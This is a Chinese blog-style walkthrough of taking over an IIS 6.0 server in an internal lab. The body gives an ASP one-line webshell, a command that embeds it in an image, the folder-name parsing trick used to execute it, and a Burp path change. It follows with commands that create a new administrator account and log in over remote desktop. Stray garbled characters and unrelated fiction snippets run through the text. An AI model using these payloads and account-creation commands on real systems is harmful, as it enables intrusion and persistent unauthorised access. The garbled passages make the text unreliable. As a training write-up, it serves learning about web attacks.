記錄自己的第一次完整拿站

記錄自己的第一次完整拿站

環(huán)境:公司內網虛擬環(huán)境

等級:基礎入門工作考核

注:此處操作省略部分信息收集和其它漏洞測試步驟

如:

后門尋找:目錄枚舉獲得

賬號密碼:sql注入獲得

??? 服務器信息:sql注入獲得

(一)WebShell


管理界面提供了完整的服務器信息,包含數(shù)據庫文件地址


瀏覽后臺我們發(fā)現(xiàn)存在大量的上傳界面掂恕,所以上傳漏洞變成了我們的切入點

嘗試發(fā)現(xiàn)只支持圖片類型上傳

嘗試一:圖片馬上傳 ?

語句:

一句話asp馬:<%eval request("a")%>

制作圖片馬:copy 2.jpg/b + 1.asp/a 1.jpg

上傳結果是我們的圖片馬被重命名拖陆,無法正常執(zhí)行



嘗試二:

我們之前的信息搜集中已經發(fā)現(xiàn)IIS版本6.0,

這里可以聯(lián)想到IIS 6.0的解析漏洞

這里簡單科普:

IIS 6.0解析漏洞主要有兩種:漏洞1:在網站下建立文件夾的名字為 *.asp懊亡、*.asa 的文件夾依啰,其目錄內的任何擴展名的文件都被 IIS 當作 asp 文件來解析并執(zhí)行。例如創(chuàng)建目錄 vidun.asp店枣,那么 /vidun.asp/1.jpg 將被當作 asp 文件來執(zhí)行速警。IIS解析漏洞2:網站上傳圖片的時候叹誉,將網頁木馬文件的名字改成“*.asp;.jpg”,也同樣會被 IIS 當作 asp 文件來解析并執(zhí)行闷旧。例如上傳一個圖片文件长豁,名字叫“vidun.asp;.jpg”的木馬文件,該文件可以被當作 asp 文件解析并執(zhí)行忙灼。

關于第二種解析漏洞匠襟,我們可以構造“1.asp;.jpg”文件,然而結果顯而易見该园,文件會被重命名宅此,并不是我們想要的asp文件。

所以我們的關注點回到第一種解析漏洞上來:

關鍵詞:文件夾創(chuàng)建


我們繼續(xù)后臺發(fā)現(xiàn)爬范,數(shù)據備份界面提供了數(shù)據庫功能父腕,而且還提供了文件夾自動創(chuàng)建功能

所以,新的嘗試開始青瀑。


我們在圖片文件夾(upfile)下創(chuàng)建了一個新的文件夾song.asp

然后重新進行之前的上傳圖片馬操作璧亮,

并使用burpsuite改包修改圖片馬上傳位置到/upfile/song.asp/下



我們可以看到是我們想要的路徑,并且斥难,文件被重名了了枝嘶,不過沒有關系~


接下來,掏出珍藏版過刀菜狗(手動滑稽)

注:使用被修改后的文件名連接


連接成功哑诊!


(二)提權

使用菜刀上傳asp大馬 / cmd命令工具 / pr 工具


借助asp馬運行cmd


借助pr工具創(chuàng)建系統(tǒng)用戶并提權

net user xxx 123456 /add


net localgroup administrators xxx /add


tasklist /svc


netstat -nao


使用賬號密碼遠程登陸


注:像此處window server 2003可能會遇到服務器超出最大允許連接數(shù)的情況原因是我們平時在使用服務器操作系統(tǒng)的時候群扶,往往是登錄遠程桌面后是直接關閉遠程桌面窗口,而不是選擇注銷的方式來退出镀裤,那么實際上遠程會話并沒有釋放掉竞阐,而是繼續(xù)保留在服務器端,這樣就會占用總的鏈接數(shù)暑劝。當這個數(shù)量達到最大允許值時就會出現(xiàn)超過遠程連接會話數(shù)骆莹,從而導致其它用戶無法登錄到系統(tǒng)。

解決方式:mstsc /admin (強行注銷其他用戶并登陸)

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末担猛,一起剝皮案震驚了整個濱河市幕垦,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌傅联,老刑警劉巖先改,帶你破解...
    沈念sama閱讀 211,265評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異蒸走,居然都是意外死亡仇奶,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,078評論 2 385
  • 文/潘曉璐 我一進店門载碌,熙熙樓的掌柜王于貴愁眉苦臉地迎上來猜嘱,“玉大人衅枫,你說我怎么就攤上這事±柿妫” “怎么了弦撩?”我有些...
    開封第一講書人閱讀 156,852評論 0 347
  • 文/不壞的土叔 我叫張陵,是天一觀的道長论皆。 經常有香客問我益楼,道長,這世上最難降的妖魔是什么点晴? 我笑而不...
    開封第一講書人閱讀 56,408評論 1 283
  • 正文 為了忘掉前任感凤,我火速辦了婚禮,結果婚禮上粒督,老公的妹妹穿的比我還像新娘陪竿。我一直安慰自己,他們只是感情好屠橄,可當我...
    茶點故事閱讀 65,445評論 5 384
  • 文/花漫 我一把揭開白布族跛。 她就那樣靜靜地躺著,像睡著了一般锐墙。 火紅的嫁衣襯著肌膚如雪礁哄。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 49,772評論 1 290
  • 那天溪北,我揣著相機與錄音桐绒,去河邊找鬼。 笑死之拨,一個胖子當著我的面吹牛茉继,可吹牛的內容都是我干的。 我是一名探鬼主播敦锌,決...
    沈念sama閱讀 38,921評論 3 406
  • 文/蒼蘭香墨 我猛地睜開眼馒疹,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了乙墙?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 37,688評論 0 266
  • 序言:老撾萬榮一對情侶失蹤生均,失蹤者是張志新(化名)和其女友劉穎听想,沒想到半個月后,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體马胧,經...
    沈念sama閱讀 44,130評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡汉买,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 36,467評論 2 325
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了佩脊。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片蛙粘。...
    茶點故事閱讀 38,617評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡垫卤,死狀恐怖,靈堂內的尸體忽然破棺而出出牧,到底是詐尸還是另有隱情穴肘,我是刑警寧澤,帶...
    沈念sama閱讀 34,276評論 4 329
  • 正文 年R本政府宣布舔痕,位于F島的核電站评抚,受9級特大地震影響,放射性物質發(fā)生泄漏伯复。R本人自食惡果不足惜慨代,卻給世界環(huán)境...
    茶點故事閱讀 39,882評論 3 312
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望啸如。 院中可真熱鬧侍匙,春花似錦、人聲如沸叮雳。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,740評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽债鸡。三九已至江滨,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間厌均,已是汗流浹背唬滑。 一陣腳步聲響...
    開封第一講書人閱讀 31,967評論 1 265
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留棺弊,地道東北人晶密。 一個月前我還...
    沈念sama閱讀 46,315評論 2 360
  • 正文 我出身青樓,卻偏偏與公主長得像模她,于是被迫代替她去往敵國和親稻艰。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 43,486評論 2 348

推薦閱讀更多精彩內容

  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell實現(xiàn)與隱藏探究 一...
    JackyTsuuuy閱讀 20,734評論 2 13
  • 一套實用的滲透測試崗位面試題侈净,你會嗎尊勿? 1.拿到一個待檢測的站,你覺得應該先做什么畜侦? 收集信息 whois元扔、網站源...
    g0閱讀 4,818評論 0 9
  • 為什么會存在文件上傳呢? 網站為了給用戶更好的體驗旋膳,也有助于提高業(yè)務效率澎语。 一般的社會網絡的web應用程序,博客,...
    青山i閱讀 502評論 0 0
  • 當Fall站在這塊藍色的紗染山水前被電擊一樣邁不開腳擅羞,又沮喪地說店家不賣時尸变,我霸氣地說,走减俏,我去給你買召烂,這塊紗是我...
    青蘭閱讀 708評論 0 1
  • 像我說的電話是別人用來我找別人的,不是別人來找我的垄懂。你說我太自私了骑晶,太以自我為中心了。其實這話說的點重了草慧,親人和家...
    JOBO_ba14閱讀 55評論 0 0